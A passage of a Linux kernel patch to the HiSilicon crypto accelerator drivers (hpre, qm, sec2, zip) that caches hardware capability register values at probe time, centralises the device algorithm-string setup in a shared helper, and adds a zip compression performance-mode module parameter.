+ 		offset = HPRE_CLSTR_BASE + i * HPRE_CLSTR_ADDR_INTRVL;
+ 		writel(0x0, qm->io_base + offset + HPRE_CLUSTER_INQURY);
+@@ -1025,13 +996,14 @@ static int hpre_pf_comm_regs_debugfs_init(struct hisi_qm *qm)
+ 
+ static int hpre_cluster_debugfs_init(struct hisi_qm *qm)
+ {
+-	u8 clusters_num = hpre_cluster_num(qm);
+ 	struct device *dev = &qm->pdev->dev;
+ 	char buf[HPRE_DBGFS_VAL_MAX_LEN];
+ 	struct debugfs_regset32 *regset;
+ 	struct dentry *tmp_d;
++	u8 clusters_num;
+ 	int i, ret;
+ 
++	clusters_num = qm->cap_tables.dev_cap_table[HPRE_CLUSTER_NUM_CAP_IDX].cap_val;
+ 	for (i = 0; i < clusters_num; i++) {
+ 		ret = snprintf(buf, HPRE_DBGFS_VAL_MAX_LEN, "cluster%d", i);
+ 		if (ret >= HPRE_DBGFS_VAL_MAX_LEN)
+@@ -1136,8 +1108,37 @@ static void hpre_debugfs_exit(struct hisi_qm *qm)
+ 	debugfs_remove_recursive(qm->debug.debug_root);
+ }
+ 
++static int hpre_pre_store_cap_reg(struct hisi_qm *qm)
++{
++	struct hisi_qm_cap_record *hpre_cap;
++	struct device *dev = &qm->pdev->dev;
++	size_t i, size;
++
++	size = ARRAY_SIZE(hpre_pre_store_caps);
++	hpre_cap = devm_kzalloc(dev, sizeof(*hpre_cap) * size, GFP_KERNEL);
++	if (!hpre_cap)
++		return -ENOMEM;
++
++	for (i = 0; i < size; i++) {
++		hpre_cap[i].type = hpre_pre_store_caps[i];
++		hpre_cap[i].cap_val = hisi_qm_get_hw_info(qm, hpre_basic_info,
++				      hpre_pre_store_caps[i], qm->cap_ver);
++	}
++
++	if (hpre_cap[HPRE_CLUSTER_NUM_CAP_IDX].cap_val > HPRE_CLUSTERS_NUM_MAX) {
++		dev_err(dev, "Device cluster num %u is out of range for driver supports %d!\n",
++			hpre_cap[HPRE_CLUSTER_NUM_CAP_IDX].cap_val, HPRE_CLUSTERS_NUM_MAX);
++		return -EINVAL;
++	}
++
++	qm->cap_tables.dev_cap_table = hpre_cap;
++
++	return 0;
++}
++
+ static int hpre_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ {
++	u64 alg_msk;
+ 	int ret;
+ 
+ 	if (pdev->revision == QM_HW_V1) {
+@@ -1168,7 +1169,16 @@ static int hpre_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = hpre_set_qm_algs(qm);
++	/* Fetch and save the value of capability registers */
++	ret = hpre_pre_store_cap_reg(qm);
++	if (ret) {
++		pci_err(pdev, "Failed to pre-store capability registers!\n");
++		hisi_qm_uninit(qm);
++		return ret;
++	}
++
++	alg_msk = qm->cap_tables.dev_cap_table[HPRE_DEV_ALG_BITMAP_CAP_IDX].cap_val;
++	ret = hisi_qm_set_algs(qm, alg_msk, hpre_dev_algs, ARRAY_SIZE(hpre_dev_algs));
+ 	if (ret) {
+ 		pci_err(pdev, "Failed to set hpre algs!\n");
+ 		hisi_qm_uninit(qm);
+@@ -1181,11 +1191,12 @@ static int hpre_show_last_regs_init(struct hisi_qm *qm)
+ {
+ 	int cluster_dfx_regs_num =  ARRAY_SIZE(hpre_cluster_dfx_regs);
+ 	int com_dfx_regs_num = ARRAY_SIZE(hpre_com_dfx_regs);
+-	u8 clusters_num = hpre_cluster_num(qm);
+ 	struct qm_debug *debug = &qm->debug;
+ 	void __iomem *io_base;
++	u8 clusters_num;
+ 	int i, j, idx;
+ 
++	clusters_num = qm->cap_tables.dev_cap_table[HPRE_CLUSTER_NUM_CAP_IDX].cap_val;
+ 	debug->last_words = kcalloc(cluster_dfx_regs_num * clusters_num +
+ 			com_dfx_regs_num, sizeof(unsigned int), GFP_KERNEL);
+ 	if (!debug->last_words)
+@@ -1222,10 +1233,10 @@ static void hpre_show_last_dfx_regs(struct hisi_qm *qm)
+ {
+ 	int cluster_dfx_regs_num =  ARRAY_SIZE(hpre_cluster_dfx_regs);
+ 	int com_dfx_regs_num = ARRAY_SIZE(hpre_com_dfx_regs);
+-	u8 clusters_num = hpre_cluster_num(qm);
+ 	struct qm_debug *debug = &qm->debug;
+ 	struct pci_dev *pdev = qm->pdev;
+ 	void __iomem *io_base;
++	u8 clusters_num;
+ 	int i, j, idx;
+ 	u32 val;
+ 
+@@ -1240,6 +1251,7 @@ static void hpre_show_last_dfx_regs(struct hisi_qm *qm)
+ 			  hpre_com_dfx_regs[i].name, debug->last_words[i], val);
+ 	}
+ 
++	clusters_num = qm->cap_tables.dev_cap_table[HPRE_CLUSTER_NUM_CAP_IDX].cap_val;
+ 	for (i = 0; i < clusters_num; i++) {
+ 		io_base = qm->io_base + hpre_cluster_offsets[i];
+ 		for (j = 0; j <  cluster_dfx_regs_num; j++) {
+diff --git a/drivers/crypto/hisilicon/qm.c b/drivers/crypto/hisilicon/qm.c
+index f9acf7ecc41be..5539be1bfb402 100644
+--- a/drivers/crypto/hisilicon/qm.c
++++ b/drivers/crypto/hisilicon/qm.c
+@@ -237,6 +237,8 @@
+ #define QM_QOS_MAX_CIR_S		11
+ #define QM_AUTOSUSPEND_DELAY		3000
+ 
++#define QM_DEV_ALG_MAX_LEN		256
++
+ #define QM_MK_CQC_DW3_V1(hop_num, pg_sz, buf_sz, cqe_sz) \
+ 	(((hop_num) << QM_CQ_HOP_NUM_SHIFT)	| \
+ 	((pg_sz) << QM_CQ_PAGE_SIZE_SHIFT)	| \
+@@ -315,6 +317,13 @@ enum qm_basic_type {
+ 	QM_VF_IRQ_NUM_CAP,
+ };
+ 
++enum qm_pre_store_cap_idx {
++	QM_EQ_IRQ_TYPE_CAP_IDX = 0x0,
++	QM_AEQ_IRQ_TYPE_CAP_IDX,
++	QM_ABN_IRQ_TYPE_CAP_IDX,
++	QM_PF2VF_IRQ_TYPE_CAP_IDX,
++};
++
+ static const struct hisi_qm_cap_info qm_cap_info_comm[] = {
+ 	{QM_SUPPORT_DB_ISOLATION, 0x30,   0, BIT(0),  0x0, 0x0, 0x0},
+ 	{QM_SUPPORT_FUNC_QOS,     0x3100, 0, BIT(8),  0x0, 0x0, 0x1},
+@@ -344,6 +353,13 @@ static const struct hisi_qm_cap_info qm_basic_info[] = {
+ 	{QM_VF_IRQ_NUM_CAP,     0x311c,   0,  GENMASK(15, 0), 0x1,       0x2,       0x3},
+ };
+ 
++static const u32 qm_pre_store_caps[] = {
++	QM_EQ_IRQ_TYPE_CAP,
++	QM_AEQ_IRQ_TYPE_CAP,
++	QM_ABN_IRQ_TYPE_CAP,
++	QM_PF2VF_IRQ_TYPE_CAP,
++};
++
+ struct qm_mailbox {
+ 	__le16 w0;
+ 	__le16 queue_num;
+@@ -781,6 +797,40 @@ static void qm_get_xqc_depth(struct hisi_qm *qm, u16 *low_bits,
+ 	*high_bits = (depth >> QM_XQ_DEPTH_SHIFT) & QM_XQ_DEPTH_MASK;
+ }
+ 
++int hisi_qm_set_algs(struct hisi_qm *qm, u64 alg_msk, const struct qm_dev_alg *dev_algs,
++		     u32 dev_algs_size)
++{
++	struct device *dev = &qm->pdev->dev;
++	char *algs, *ptr;
++	int i;
++
++	if (!qm->uacce)
++		return 0;
++
++	if (dev_algs_size >= QM_DEV_ALG_MAX_LEN) {
++		dev_err(dev, "algs size %u is equal or larger than %d.\n",
++			dev_algs_size, QM_DEV_ALG_MAX_LEN);
++		return -EINVAL;
++	}
++
++	algs = devm_kzalloc(dev, QM_DEV_ALG_MAX_LEN * sizeof(char), GFP_KERNEL);
++	if (!algs)
++		return -ENOMEM;
++
++	for (i = 0; i < dev_algs_size; i++)
++		if (alg_msk & dev_algs[i].alg_msk)
++			strcat(algs, dev_algs[i].alg);
++
++	ptr = strrchr(algs, '\n');
++	if (ptr) {
++		*ptr = '\0';
++		qm->uacce->algs = algs;
++	}
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(hisi_qm_set_algs);
++
+ static u32 qm_get_irq_num(struct hisi_qm *qm)
+ {
+ 	if (qm->fun_type == QM_HW_PF)
+@@ -4804,7 +4854,7 @@ static void qm_unregister_abnormal_irq(struct hisi_qm *qm)
+ 	if (qm->fun_type == QM_HW_VF)
+ 		return;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_ABN_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_ABN_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_ABN_IRQ_TYPE_MASK))
+ 		return;
+ 
+@@ -4821,7 +4871,7 @@ static int qm_register_abnormal_irq(struct hisi_qm *qm)
+ 	if (qm->fun_type == QM_HW_VF)
+ 		return 0;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_ABN_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_ABN_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_ABN_IRQ_TYPE_MASK))
+ 		return 0;
+ 
+@@ -4838,7 +4888,7 @@ static void qm_unregister_mb_cmd_irq(struct hisi_qm *qm)
+ 	struct pci_dev *pdev = qm->pdev;
+ 	u32 irq_vector, val;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_PF2VF_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_PF2VF_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return;
+ 
+@@ -4852,7 +4902,7 @@ static int qm_register_mb_cmd_irq(struct hisi_qm *qm)
+ 	u32 irq_vector, val;
+ 	int ret;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_PF2VF_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_PF2VF_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return 0;
+ 
+@@ -4869,7 +4919,7 @@ static void qm_unregister_aeq_irq(struct hisi_qm *qm)
+ 	struct pci_dev *pdev = qm->pdev;
+ 	u32 irq_vector, val;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_AEQ_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_AEQ_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return;
+ 
+@@ -4883,7 +4933,7 @@ static int qm_register_aeq_irq(struct hisi_qm *qm)
+ 	u32 irq_vector, val;
+ 	int ret;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_AEQ_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_AEQ_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return 0;
+ 
+@@ -4901,7 +4951,7 @@ static void qm_unregister_eq_irq(struct hisi_qm *qm)
+ 	struct pci_dev *pdev = qm->pdev;
+ 	u32 irq_vector, val;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_EQ_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_EQ_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return;
+ 
+@@ -4915,7 +4965,7 @@ static int qm_register_eq_irq(struct hisi_qm *qm)
+ 	u32 irq_vector, val;
+ 	int ret;
+ 
+-	val = hisi_qm_get_hw_info(qm, qm_basic_info, QM_EQ_IRQ_TYPE_CAP, qm->cap_ver);
++	val = qm->cap_tables.qm_cap_table[QM_EQ_IRQ_TYPE_CAP_IDX].cap_val;
+ 	if (!((val >> QM_IRQ_TYPE_SHIFT) & QM_IRQ_TYPE_MASK))
+ 		return 0;
+ 
+@@ -5003,7 +5053,29 @@ static int qm_get_qp_num(struct hisi_qm *qm)
+ 	return 0;
+ }
+ 
+-static void qm_get_hw_caps(struct hisi_qm *qm)
++static int qm_pre_store_irq_type_caps(struct hisi_qm *qm)
++{
++	struct hisi_qm_cap_record *qm_cap;
++	struct pci_dev *pdev = qm->pdev;
++	size_t i, size;
++
++	size = ARRAY_SIZE(qm_pre_store_caps);
++	qm_cap = devm_kzalloc(&pdev->dev, sizeof(*qm_cap) * size, GFP_KERNEL);
++	if (!qm_cap)
++		return -ENOMEM;
++
++	for (i = 0; i < size; i++) {
++		qm_cap[i].type = qm_pre_store_caps[i];
++		qm_cap[i].cap_val = hisi_qm_get_hw_info(qm, qm_basic_info,
++							qm_pre_store_caps[i], qm->cap_ver);
++	}
++
++	qm->cap_tables.qm_cap_table = qm_cap;
++
++	return 0;
++}
++
++static int qm_get_hw_caps(struct hisi_qm *qm)
+ {
+ 	const struct hisi_qm_cap_info *cap_info = qm->fun_type == QM_HW_PF ?
+ 						  qm_cap_info_pf : qm_cap_info_vf;
+@@ -5034,6 +5106,9 @@ static void qm_get_hw_caps(struct hisi_qm *qm)
+ 		if (val)
+ 			set_bit(cap_info[i].type, &qm->caps);
+ 	}
++
++	/* Fetch and save the value of irq type related capability registers */
++	return qm_pre_store_irq_type_caps(qm);
+ }
+ 
+ static int qm_get_pci_res(struct hisi_qm *qm)
+@@ -5055,7 +5130,10 @@ static int qm_get_pci_res(struct hisi_qm *qm)
+ 		goto err_request_mem_regions;
+ 	}
+ 
+-	qm_get_hw_caps(qm);
++	ret = qm_get_hw_caps(qm);
++	if (ret)
++		goto err_ioremap;
++
+ 	if (test_bit(QM_SUPPORT_DB_ISOLATION, &qm->caps)) {
+ 		qm->db_interval = QM_QP_DB_INTERVAL;
+ 		qm->db_phys_base = pci_resource_start(pdev, PCI_BAR_4);
+diff --git a/drivers/crypto/hisilicon/sec2/sec.h b/drivers/crypto/hisilicon/sec2/sec.h
+index 3e57fc04b3770..410c83712e285 100644
+--- a/drivers/crypto/hisilicon/sec2/sec.h
++++ b/drivers/crypto/hisilicon/sec2/sec.h
+@@ -220,6 +220,13 @@ enum sec_cap_type {
+ 	SEC_CORE4_ALG_BITMAP_HIGH,
+ };
+ 
++enum sec_cap_reg_record_idx {
++	SEC_DRV_ALG_BITMAP_LOW_IDX = 0x0,
++	SEC_DRV_ALG_BITMAP_HIGH_IDX,
++	SEC_DEV_ALG_BITMAP_LOW_IDX,
++	SEC_DEV_ALG_BITMAP_HIGH_IDX,
++};
++
+ void sec_destroy_qps(struct hisi_qp **qps, int qp_num);
+ struct hisi_qp **sec_create_qps(void);
+ int sec_register_to_crypto(struct hisi_qm *qm);
+diff --git a/drivers/crypto/hisilicon/sec2/sec_crypto.c b/drivers/crypto/hisilicon/sec2/sec_crypto.c
+index 84ae8ddd1a131..cae7c414bdaf4 100644
+--- a/drivers/crypto/hisilicon/sec2/sec_crypto.c
++++ b/drivers/crypto/hisilicon/sec2/sec_crypto.c
+@@ -2546,8 +2546,12 @@ err:
+ 
+ int sec_register_to_crypto(struct hisi_qm *qm)
+ {
+-	u64 alg_mask = sec_get_alg_bitmap(qm, SEC_DRV_ALG_BITMAP_HIGH, SEC_DRV_ALG_BITMAP_LOW);
+-	int ret;
++	u64 alg_mask;
++	int ret = 0;
++
++	alg_mask = sec_get_alg_bitmap(qm, SEC_DRV_ALG_BITMAP_HIGH_IDX,
++				      SEC_DRV_ALG_BITMAP_LOW_IDX);
++
+ 
+ 	ret = sec_register_skcipher(alg_mask);
+ 	if (ret)
+@@ -2562,7 +2566,10 @@ int sec_register_to_crypto(struct hisi_qm *qm)
+ 
+ void sec_unregister_from_crypto(struct hisi_qm *qm)
+ {
+-	u64 alg_mask = sec_get_alg_bitmap(qm, SEC_DRV_ALG_BITMAP_HIGH, SEC_DRV_ALG_BITMAP_LOW);
++	u64 alg_mask;
++
++	alg_mask = sec_get_alg_bitmap(qm, SEC_DRV_ALG_BITMAP_HIGH_IDX,
++				      SEC_DRV_ALG_BITMAP_LOW_IDX);
+ 
+ 	sec_unregister_aead(alg_mask, ARRAY_SIZE(sec_aeads));
+ 	sec_unregister_skcipher(alg_mask, ARRAY_SIZE(sec_skciphers));
+diff --git a/drivers/crypto/hisilicon/sec2/sec_main.c b/drivers/crypto/hisilicon/sec2/sec_main.c
+index e384988bda917..4bab5000a13e5 100644
+--- a/drivers/crypto/hisilicon/sec2/sec_main.c
++++ b/drivers/crypto/hisilicon/sec2/sec_main.c
+@@ -121,7 +121,6 @@
+ 					GENMASK_ULL(42, 25))
+ #define SEC_AEAD_BITMAP			(GENMASK_ULL(7, 6) | GENMASK_ULL(18, 17) | \
+ 					GENMASK_ULL(45, 43))
+-#define SEC_DEV_ALG_MAX_LEN		256
+ 
+ struct sec_hw_error {
+ 	u32 int_msk;
+@@ -133,11 +132,6 @@ struct sec_dfx_item {
+ 	u32 offset;
+ };
+ 
+-struct sec_dev_alg {
+-	u64 alg_msk;
+-	const char *algs;
+-};
+-
+ static const char sec_name[] = "hisi_sec2";
+ static struct dentry *sec_debugfs_root;
+ 
+@@ -174,15 +168,22 @@ static const struct hisi_qm_cap_info sec_basic_info[] = {
+ 	{SEC_CORE4_ALG_BITMAP_HIGH, 0x3170, 0, GENMASK(31, 0), 0x3FFF, 0x3FFF, 0x3FFF},
+ };
+ 
+-static const struct sec_dev_alg sec_dev_algs[] = { {
++static const u32 sec_pre_store_caps[] = {
++	SEC_DRV_ALG_BITMAP_LOW,
++	SEC_DRV_ALG_BITMAP_HIGH,
++	SEC_DEV_ALG_BITMAP_LOW,
++	SEC_DEV_ALG_BITMAP_HIGH,
++};
++
++static const struct qm_dev_alg sec_dev_algs[] = { {
+ 		.alg_msk = SEC_CIPHER_BITMAP,
+-		.algs = "cipher\n",
++		.alg = "cipher\n",
+ 	}, {
+ 		.alg_msk = SEC_DIGEST_BITMAP,
+-		.algs = "digest\n",
++		.alg = "digest\n",
+ 	}, {
+ 		.alg_msk = SEC_AEAD_BITMAP,
+-		.algs = "aead\n",
++		.alg = "aead\n",
+ 	},
+ };
+ 
+@@ -395,8 +396,8 @@ u64 sec_get_alg_bitmap(struct hisi_qm *qm, u32 high, u32 low)
+ {
+ 	u32 cap_val_h, cap_val_l;
+ 
+-	cap_val_h = hisi_qm_get_hw_info(qm, sec_basic_info, high, qm->cap_ver);
+-	cap_val_l = hisi_qm_get_hw_info(qm, sec_basic_info, low, qm->cap_ver);
++	cap_val_h = qm->cap_tables.dev_cap_table[high].cap_val;
++	cap_val_l = qm->cap_tables.dev_cap_table[low].cap_val;
+ 
+ 	return ((u64)cap_val_h << SEC_ALG_BITMAP_SHIFT) | (u64)cap_val_l;
+ }
+@@ -1079,37 +1080,31 @@ static int sec_pf_probe_init(struct sec_dev *sec)
+ 	return ret;
+ }
+ 
+-static int sec_set_qm_algs(struct hisi_qm *qm)
++static int sec_pre_store_cap_reg(struct hisi_qm *qm)
+ {
+-	struct device *dev = &qm->pdev->dev;
+-	char *algs, *ptr;
+-	u64 alg_mask;
+-	int i;
+-
+-	if (!qm->use_sva)
+-		return 0;
++	struct hisi_qm_cap_record *sec_cap;
++	struct pci_dev *pdev = qm->pdev;
++	size_t i, size;
+ 
+-	algs = devm_kzalloc(dev, SEC_DEV_ALG_MAX_LEN * sizeof(char), GFP_KERNEL);
+-	if (!algs)
++	size = ARRAY_SIZE(sec_pre_store_caps);
++	sec_cap = devm_kzalloc(&pdev->dev, sizeof(*sec_cap) * size, GFP_KERNEL);
++	if (!sec_cap)
+ 		return -ENOMEM;
+ 
+-	alg_mask = sec_get_alg_bitmap(qm, SEC_DEV_ALG_BITMAP_HIGH, SEC_DEV_ALG_BITMAP_LOW);
+-
+-	for (i = 0; i < ARRAY_SIZE(sec_dev_algs); i++)
+-		if (alg_mask & sec_dev_algs[i].alg_msk)
+-			strcat(algs, sec_dev_algs[i].algs);
+-
+-	ptr = strrchr(algs, '\n');
+-	if (ptr)
+-		*ptr = '\0';
++	for (i = 0; i < size; i++) {
++		sec_cap[i].type = sec_pre_store_caps[i];
++		sec_cap[i].cap_val = hisi_qm_get_hw_info(qm, sec_basic_info,
++				     sec_pre_store_caps[i], qm->cap_ver);
++	}
+ 
+-	qm->uacce->algs = algs;
++	qm->cap_tables.dev_cap_table = sec_cap;
+ 
+ 	return 0;
+ }
+ 
+ static int sec_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ {
++	u64 alg_msk;
+ 	int ret;
+ 
+ 	qm->pdev = pdev;
+@@ -1144,7 +1139,16 @@ static int sec_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = sec_set_qm_algs(qm);
++	/* Fetch and save the value of capability registers */
++	ret = sec_pre_store_cap_reg(qm);
++	if (ret) {
++		pci_err(qm->pdev, "Failed to pre-store capability registers!\n");
++		hisi_qm_uninit(qm);
++		return ret;
++	}
++
++	alg_msk = sec_get_alg_bitmap(qm, SEC_DEV_ALG_BITMAP_HIGH_IDX, SEC_DEV_ALG_BITMAP_LOW_IDX);
++	ret = hisi_qm_set_algs(qm, alg_msk, sec_dev_algs, ARRAY_SIZE(sec_dev_algs));
+ 	if (ret) {
+ 		pci_err(qm->pdev, "Failed to set sec algs!\n");
+ 		hisi_qm_uninit(qm);
+diff --git a/drivers/crypto/hisilicon/zip/zip_main.c b/drivers/crypto/hisilicon/zip/zip_main.c
+index 190b4fecfc747..9e3f5bca27dee 100644
+--- a/drivers/crypto/hisilicon/zip/zip_main.c
++++ b/drivers/crypto/hisilicon/zip/zip_main.c
+@@ -74,7 +74,6 @@
+ #define HZIP_AXI_SHUTDOWN_ENABLE	BIT(14)
+ #define HZIP_WR_PORT			BIT(11)
+ 
+-#define HZIP_DEV_ALG_MAX_LEN		256
+ #define HZIP_ALG_ZLIB_BIT		GENMASK(1, 0)
+ #define HZIP_ALG_GZIP_BIT		GENMASK(3, 2)
+ #define HZIP_ALG_DEFLATE_BIT		GENMASK(5, 4)
+@@ -107,6 +106,14 @@
+ #define HZIP_CLOCK_GATED_EN		(HZIP_CORE_GATED_EN | \
+ 					 HZIP_CORE_GATED_OOO_EN)
+ 
++/* zip comp high performance */
++#define HZIP_HIGH_PERF_OFFSET		0x301208
++
++enum {
++	HZIP_HIGH_COMP_RATE,
++	HZIP_HIGH_COMP_PERF,
++};
++
+ static const char hisi_zip_name[] = "hisi_zip";
+ static struct dentry *hzip_debugfs_root;
+ 
+@@ -120,23 +127,18 @@ struct zip_dfx_item {
+ 	u32 offset;
+ };
+ 
+-struct zip_dev_alg {
+-	u32 alg_msk;
+-	const char *algs;
+-};
+-
+-static const struct zip_dev_alg zip_dev_algs[] = { {
++static const struct qm_dev_alg zip_dev_algs[] = { {
+ 		.alg_msk = HZIP_ALG_ZLIB_BIT,
+-		.algs = "zlib\n",
++		.alg = "zlib\n",
+ 	}, {
+ 		.alg_msk = HZIP_ALG_GZIP_BIT,
+-		.algs = "gzip\n",
++		.alg = "gzip\n",
+ 	}, {
+ 		.alg_msk = HZIP_ALG_DEFLATE_BIT,
+-		.algs = "deflate\n",
++		.alg = "deflate\n",
+ 	}, {
+ 		.alg_msk = HZIP_ALG_LZ77_BIT,
+-		.algs = "lz77_zstd\n",
++		.alg = "lz77_zstd\n",
+ 	},
+ };
+ 
+@@ -247,6 +249,26 @@ static struct hisi_qm_cap_info zip_basic_cap_info[] = {
+ 	{ZIP_CAP_MAX, 0x317c, 0, GENMASK(0, 0), 0x0, 0x0, 0x0}
+ };
+ 
++enum zip_pre_store_cap_idx {
++	ZIP_CORE_NUM_CAP_IDX = 0x0,
++	ZIP_CLUSTER_COMP_NUM_CAP_IDX,
++	ZIP_CLUSTER_DECOMP_NUM_CAP_IDX,
++	ZIP_DECOMP_ENABLE_BITMAP_IDX,
++	ZIP_COMP_ENABLE_BITMAP_IDX,
++	ZIP_DRV_ALG_BITMAP_IDX,
++	ZIP_DEV_ALG_BITMAP_IDX,
++};
++
++static const u32 zip_pre_store_caps[] = {
++	ZIP_CORE_NUM_CAP,
++	ZIP_CLUSTER_COMP_NUM_CAP,
++	ZIP_CLUSTER_DECOMP_NUM_CAP,
++	ZIP_DECOMP_ENABLE_BITMAP,
++	ZIP_COMP_ENABLE_BITMAP,
++	ZIP_DRV_ALG_BITMAP,
++	ZIP_DEV_ALG_BITMAP,
++};
++
+ enum {
+ 	HZIP_COMP_CORE0,
+ 	HZIP_COMP_CORE1,
+@@ -352,6 +374,37 @@ static int hzip_diff_regs_show(struct seq_file *s, void *unused)
+ 	return 0;
+ }
+ DEFINE_SHOW_ATTRIBUTE(hzip_diff_regs);
++
++static int perf_mode_set(const char *val, const struct kernel_param *kp)
++{
++	int ret;
++	u32 n;
++
++	if (!val)
++		return -EINVAL;
++
++	ret = kstrtou32(val, 10, &n);
++	if (ret != 0 || (n != HZIP_HIGH_COMP_PERF &&
++			 n != HZIP_HIGH_COMP_RATE))
++		return -EINVAL;
++
++	return param_set_int(val, kp);
++}
++
++static const struct kernel_param_ops zip_com_perf_ops = {
++	.set = perf_mode_set,
++	.get = param_get_int,
++};
++
++/*
++ * perf_mode = 0 means enable high compression rate mode,
++ * perf_mode = 1 means enable high compression performance mode.
++ * These two modes only apply to the compression direction.
++ */
++static u32 perf_mode = HZIP_HIGH_COMP_RATE;
++module_param_cb(perf_mode, &zip_com_perf_ops, &perf_mode, 0444);
++MODULE_PARM_DESC(perf_mode, "ZIP high perf mode 0(default), 1(enable)");
++
+ static const struct kernel_param_ops zip_uacce_mode_ops = {
+ 	.set = uacce_mode_set,
+ 	.get = param_get_int,
+@@ -410,40 +463,33 @@ bool hisi_zip_alg_support(struct hisi_qm *qm, u32 alg)
+ {
+ 	u32 cap_val;
+ 
+-	cap_val = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_DRV_ALG_BITMAP, qm->cap_ver);
++	cap_val = qm->cap_tables.dev_cap_table[ZIP_DRV_ALG_BITMAP_IDX].cap_val;
+ 	if ((alg & cap_val) == alg)
+ 		return true;
+ 
+ 	return false;
+ }
+ 
+-static int hisi_zip_set_qm_algs(struct hisi_qm *qm)
++static int hisi_zip_set_high_perf(struct hisi_qm *qm)
+ {
+-	struct device *dev = &qm->pdev->dev;
+-	char *algs, *ptr;
+-	u32 alg_mask;
+-	int i;
+-
+-	if (!qm->use_sva)
+-		return 0;
+-
+-	algs = devm_kzalloc(dev, HZIP_DEV_ALG_MAX_LEN * sizeof(char), GFP_KERNEL);
+-	if (!algs)
+-		return -ENOMEM;
+-
+-	alg_mask = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_DEV_ALG_BITMAP, qm->cap_ver);
+-
+-	for (i = 0; i < ARRAY_SIZE(zip_dev_algs); i++)
+-		if (alg_mask & zip_dev_algs[i].alg_msk)
+-			strcat(algs, zip_dev_algs[i].algs);
+-
+-	ptr = strrchr(algs, '\n');
+-	if (ptr)
+-		*ptr = '\0';
++	u32 val;
++	int ret;
+ 
+-	qm->uacce->algs = algs;
++	val = readl_relaxed(qm->io_base + HZIP_HIGH_PERF_OFFSET);
++	if (perf_mode == HZIP_HIGH_COMP_PERF)
++		val |= HZIP_HIGH_COMP_PERF;
++	else
++		val &= ~HZIP_HIGH_COMP_PERF;
++
++	/* Set perf mode */
++	writel(val, qm->io_base + HZIP_HIGH_PERF_OFFSET);
++	ret = readl_relaxed_poll_timeout(qm->io_base + HZIP_HIGH_PERF_OFFSET,
++					 val, val == perf_mode, HZIP_DELAY_1_US,
++					 HZIP_POLL_TIMEOUT_US);
++	if (ret)
++		pci_err(qm->pdev, "failed to set perf mode\n");
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static void hisi_zip_open_sva_prefetch(struct hisi_qm *qm)
+@@ -542,10 +588,8 @@ static int hisi_zip_set_user_domain_and_cache(struct hisi_qm *qm)
+ 	}
+ 
+ 	/* let's open all compression/decompression cores */
+-	dcomp_bm = hisi_qm_get_hw_info(qm, zip_basic_cap_info,
+-				       ZIP_DECOMP_ENABLE_BITMAP, qm->cap_ver);
+-	comp_bm = hisi_qm_get_hw_info(qm, zip_basic_cap_info,
+-				      ZIP_COMP_ENABLE_BITMAP, qm->cap_ver);
++	dcomp_bm = qm->cap_tables.dev_cap_table[ZIP_DECOMP_ENABLE_BITMAP_IDX].cap_val;
++	comp_bm = qm->cap_tables.dev_cap_table[ZIP_COMP_ENABLE_BITMAP_IDX].cap_val;
+ 	writel(HZIP_DECOMP_CHECK_ENABLE | dcomp_bm | comp_bm, base + HZIP_CLOCK_GATE_CTRL);
+ 
+ 	/* enable sqc,cqc writeback */
+@@ -772,9 +816,8 @@ static int hisi_zip_core_debug_init(struct hisi_qm *qm)
+ 	char buf[HZIP_BUF_SIZE];
+ 	int i;
+ 
+-	zip_core_num = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_CORE_NUM_CAP, qm->cap_ver);
+-	zip_comp_core_num = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_CLUSTER_COMP_NUM_CAP,
+-						qm->cap_ver);
++	zip_core_num = qm->cap_tables.dev_cap_table[ZIP_CORE_NUM_CAP_IDX].cap_val;
++	zip_comp_core_num = qm->cap_tables.dev_cap_table[ZIP_CLUSTER_COMP_NUM_CAP_IDX].cap_val;
+ 
+ 	for (i = 0; i < zip_core_num; i++) {
+ 		if (i < zip_comp_core_num)
